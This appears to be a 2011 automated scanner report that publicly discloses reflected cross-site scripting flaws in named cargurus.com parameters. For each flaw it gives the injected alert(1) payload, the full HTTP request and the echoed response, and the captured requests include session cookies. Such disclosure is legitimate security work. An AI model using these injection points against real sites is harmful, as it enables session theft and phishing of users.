XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, cargurus.com

Report generated by XSS.CX at Sun Sep 18 13:18:21 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

XSS in cargurus.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86, BHDB, Javascript Injection, Insecure Programming, Weak Configuration, Browser Hijacking, Phishing

1.1. http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action [sourceContext parameter]

1.2. http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action [zip parameter]

1.3. http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action [zip parameter]

1.4. http://www.cargurus.com/Cars/inventorylisting/viewListingDetailAjax.action [searchedEntityId parameter]

1.5. http://www.cargurus.com/Cars/inventorylisting/viewListingDetailAjax.action [sourceContext parameter]

1.6. https://www.cargurus.com/Cars/authentication/renderLoginForm.action [redirectUrl parameter]

2. SSL certificate

3. Cookie without HttpOnly flag set

3.1. http://www.cargurus.com/Cars/inventorylisting/viewListingDetailAjax.action

3.2. http://www.cargurus.com/Cars/jsonBannerAds.action

3.3. http://www.cargurus.com/

3.4. http://www.cargurus.com/Cars/getModelList.action

3.5. http://www.cargurus.com/Cars/inventorylisting/ajaxFetchSubsetInventoryListing.action

3.6. http://www.cargurus.com/Cars/inventorylisting/priceAnalysis.action

3.7. http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action

3.8. http://www.cargurus.com/Cars/ping/doubleClickBannerAd

3.9. http://www.cargurus.com/Cars/serveJumpstartAd.action

3.10. http://www.cargurus.com/Cars/track

3.11. http://www.cargurus.com/favicon.ico

3.12. http://www.cargurus.com/gfx/icons/silk/help.png

3.13. http://www.cargurus.com/gfx/icons/silk/star.png

3.14. http://www.cargurus.com/gfx/mini/star.gif

3.15. http://www.cargurus.com/gfx/mini/star_grey.gif

3.16. http://www.cargurus.com/gfx/mini/star_half_grey.gif

3.17. http://www.cargurus.com/js/jquery/easySlider1.7.js

3.18. https://www.cargurus.com/Cars/authentication/renderLoginForm.action

3.19. https://www.cargurus.com/favicon.ico

4. Password field with autocomplete enabled

4.1. https://www.cargurus.com/Cars/authentication/renderLoginForm.action

4.2. https://www.cargurus.com/Cars/authentication/renderLoginForm.action

5. SSL cookie without secure flag set

5.1. https://www.cargurus.com/Cars/authentication/renderLoginForm.action

5.2. https://www.cargurus.com/favicon.ico

6. Cross-domain Referer leakage

6.1. http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action

6.2. http://www.cargurus.com/Cars/serveJumpstartAd.action

6.3. http://www.cargurus.com/Cars/serveJumpstartAd.action

6.4. https://www.cargurus.com/Cars/authentication/renderLoginForm.action

7. Cross-domain script include

7.1. http://www.cargurus.com/

7.2. http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action

7.3. https://www.cargurus.com/Cars/authentication/renderLoginForm.action

8. Credit card numbers disclosed

8.1. http://www.cargurus.com/Cars/inventorylisting/ajaxFetchSubsetInventoryListing.action

8.2. http://www.cargurus.com/Cars/inventorylisting/ajaxFetchSubsetInventoryListing.action

9. Robots.txt file

10. Content type incorrectly stated

10.1. http://www.cargurus.com/Cars/inventorylisting/priceAnalysis.action

10.2. http://www.cargurus.com/Cars/jsonBannerAds.action

10.3. http://www.cargurus.com/favicon.ico



1. Cross-site scripting (reflected)  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action [sourceContext parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action

Issue detail

The value of the sourceContext request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 766d1'%3balert(1)//dbb357813d0 was submitted in the sourceContext parameter. This input was echoed as 766d1';alert(1)//dbb357813d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0766d1'%3balert(1)//dbb357813d0 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.1.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:14:13 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:14:13 GMT
Access-Control-Allow-Origin: google.com,googleusercontent.com
Set-Cookie: preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; Expires=Fri, 16-Sep-2016 13:14:13 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a80220:0; path=/
Content-Length: 143810


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ww
...[SNIP]...
/inventorylisting/viewListingDetailAjax.action';
var listingsSearchManager = new ListingsSearchManager(false,
'carGurusHomePage_false_0766d1';alert(1)//dbb357813d0',
15,
'',
'',

...[SNIP]...

1.2. http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeba1'%3balert(1)//652968ded5e was submitted in the zip parameter. This input was echoed as eeba1';alert(1)//652968ded5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110eeba1'%3balert(1)//652968ded5e&sourceContext=carGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.1.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:58 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:58 GMT
Access-Control-Allow-Origin: google.com,googleusercontent.com
Set-Cookie: preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMGVlYmExJzthbGVydCgxKS8vNjUyOTY4ZGVkNWUqc3RhdGU9TUEq; Expires=Fri, 16-Sep-2016 13:13:58 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a80220:0; path=/
Content-Length: 142503


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ww
...[SNIP]...
<script type="text/javascript">

zipCode = '02110eeba1';alert(1)//652968ded5e';
var baseListingDetailUrl = '/Cars/inventorylisting/viewListingDetailAjax.action';
var listingsSearchManager = new ListingsSearchManager(false,

...[SNIP]...

1.3. http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a010"%3balert(1)//272049bda9b was submitted in the zip parameter. This input was echoed as 7a010";alert(1)//272049bda9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=021107a010"%3balert(1)//272049bda9b&sourceContext=carGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.1.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:55 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:55 GMT
Access-Control-Allow-Origin: google.com,googleusercontent.com
Set-Cookie: preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMDdhMDEwIjthbGVydCgxKS8vMjcyMDQ5YmRhOWIqc3RhdGU9TUEq; Expires=Fri, 16-Sep-2016 13:13:55 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a80220:0; path=/
Content-Length: 142517


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ww
...[SNIP]...
client.DM_addEncToLoc("section", "guru.new.dfp");
client.DM_addEncToLoc("content", "bg");
client.DM_addEncToLoc("year", "");
client.DM_addEncToLoc("zip", "021107a010";alert(1)//272049bda9b");
}
}
</script>
...[SNIP]...

1.4. http://www.cargurus.com/Cars/inventorylisting/viewListingDetailAjax.action [searchedEntityId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/viewListingDetailAjax.action

Issue detail

The value of the searchedEntityId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c426'%3balert(1)//110cf9467be was submitted in the searchedEntityId parameter. This input was echoed as 5c426';alert(1)//110cf9467be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Cars/inventorylisting/viewListingDetailAjax.action?sourceContext=carGurusHomePage_false_0&inventoryListing=24317110&postFlow=Basic&distance=MILES_75&searchedEntityId=m45c426'%3balert(1)//110cf9467be&embedType=NONE&placement=inventoryListing_mainBody&listingPagePosition=1 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:42 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:42 GMT
Access-Control-Allow-Origin: google.com,googleusercontent.com
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a80220:0; path=/
Content-Length: 29249


<div class="cg-listingDetail-wrap">
<div class="cg-listingDetail-shareWrap">
<div class="cg-sharePanel">
<div class="cg-sharePanelContent ui-corner-bottom">
<div id="f
...[SNIP]...
on(){

panelExpanded = false;
panelLoaded = false;

$(".cg-listingDetail-shareLink").click(function(){
if(panelExpanded == false){
showShareContent(24317110, 'm45c426';alert(1)//110cf9467be', '02110', '199331106902');
panelExpanded = true;
return false;
}else{
clearSharePanel();
}
return false;
})

$(".cg-close
...[SNIP]...

1.5. http://www.cargurus.com/Cars/inventorylisting/viewListingDetailAjax.action [sourceContext parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/viewListingDetailAjax.action

Issue detail

The value of the sourceContext request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4fca"style%3d"x%3aexpression(alert(1))"62e05abd2bb was submitted in the sourceContext parameter. This input was echoed as d4fca"style="x:expression(alert(1))"62e05abd2bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Cars/inventorylisting/viewListingDetailAjax.action?sourceContext=carGurusHomePage_false_0d4fca"style%3d"x%3aexpression(alert(1))"62e05abd2bb&inventoryListing=24317110&postFlow=Basic&distance=MILES_75&searchedEntityId=m4&embedType=NONE&placement=inventoryListing_mainBody&listingPagePosition=1 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:38 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:38 GMT
Access-Control-Allow-Origin: google.com,googleusercontent.com
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a80220:0; path=/
Content-Length: 29268


<div class="cg-listingDetail-wrap">
<div class="cg-listingDetail-shareWrap">
<div class="cg-sharePanel">
<div class="cg-sharePanelContent ui-corner-bottom">
<div id="f
...[SNIP]...
<button id="contactSellerButton" onclick="clearEmptyFields();submitContactDealerFormInline('detailsContactDealerForm', 24317110, false, 'carGurusHomePage_false_0d4fca"style="x:expression(alert(1))"62e05abd2bb', false);;return false;">
...[SNIP]...

1.6. https://www.cargurus.com/Cars/authentication/renderLoginForm.action [redirectUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.cargurus.com
Path:   /Cars/authentication/renderLoginForm.action

Issue detail

The value of the redirectUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceafd"style%3d"x%3aexpression(alert(1))"8551f808866 was submitted in the redirectUrl parameter. This input was echoed as ceafd"style="x:expression(alert(1))"8551f808866 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Cars/authentication/renderLoginForm.action?redirectUrl=%2FCars%2Finventorylisting%2FviewDetailsFilterViewInventoryListing.action%3Fign-makerId-entitySelectingHelper.selectedEntity%3Dm4%26amp%3Bign-modelId-entitySelectingHelper.selectedEntity%3D%26amp%3BentitySelectingHelper.selectedEntity%3Dm4%26amp%3Bzip%3D02110%26amp%3BsourceContext%3DcarGurusHomePage_false_0ceafd"style%3d"x%3aexpression(alert(1))"8551f808866 HTTP/1.1
Host: www.cargurus.com
Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.4.9.1316369668126; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:57 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:57 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=4, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020c=c0a80220:0; path=/
Content-Length: 14620


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.
...[SNIP]...
ing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0ceafd"style="x:expression(alert(1))"8551f808866" id="loginUser_redirectUrl"/>
...[SNIP]...

2. SSL certificate  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.cargurus.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  www.cargurus.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun Jun 12 19:00:00 CDT 2011
Valid to:  Wed Jun 05 18:59:59 CDT 2013

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

3. Cookie without HttpOnly flag set  previous  next
There are 19 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.cargurus.com/Cars/inventorylisting/viewListingDetailAjax.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/viewListingDetailAjax.action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Cars/inventorylisting/viewListingDetailAjax.action?sourceContext=carGurusHomePage_false_0&inventoryListing=24317110&postFlow=Basic&distance=MILES_75&searchedEntityId=m4&embedType=NONE&placement=inventoryListing_mainBody&listingPagePosition=1 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:17 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=6D0B38D1C2DEB57960F49377F22D50F6.www13; Path=/Cars
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:17 GMT
Access-Control-Allow-Origin: google.com,googleusercontent.com
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a80220:0; path=/
Content-Length: 29221


<div class="cg-listingDetail-wrap">
<div class="cg-listingDetail-shareWrap">
<div class="cg-sharePanel">
<div class="cg-sharePanelContent ui-corner-bottom">
<div id="f
...[SNIP]...

3.2. http://www.cargurus.com/Cars/jsonBannerAds.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cargurus.com
Path:   /Cars/jsonBannerAds.action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

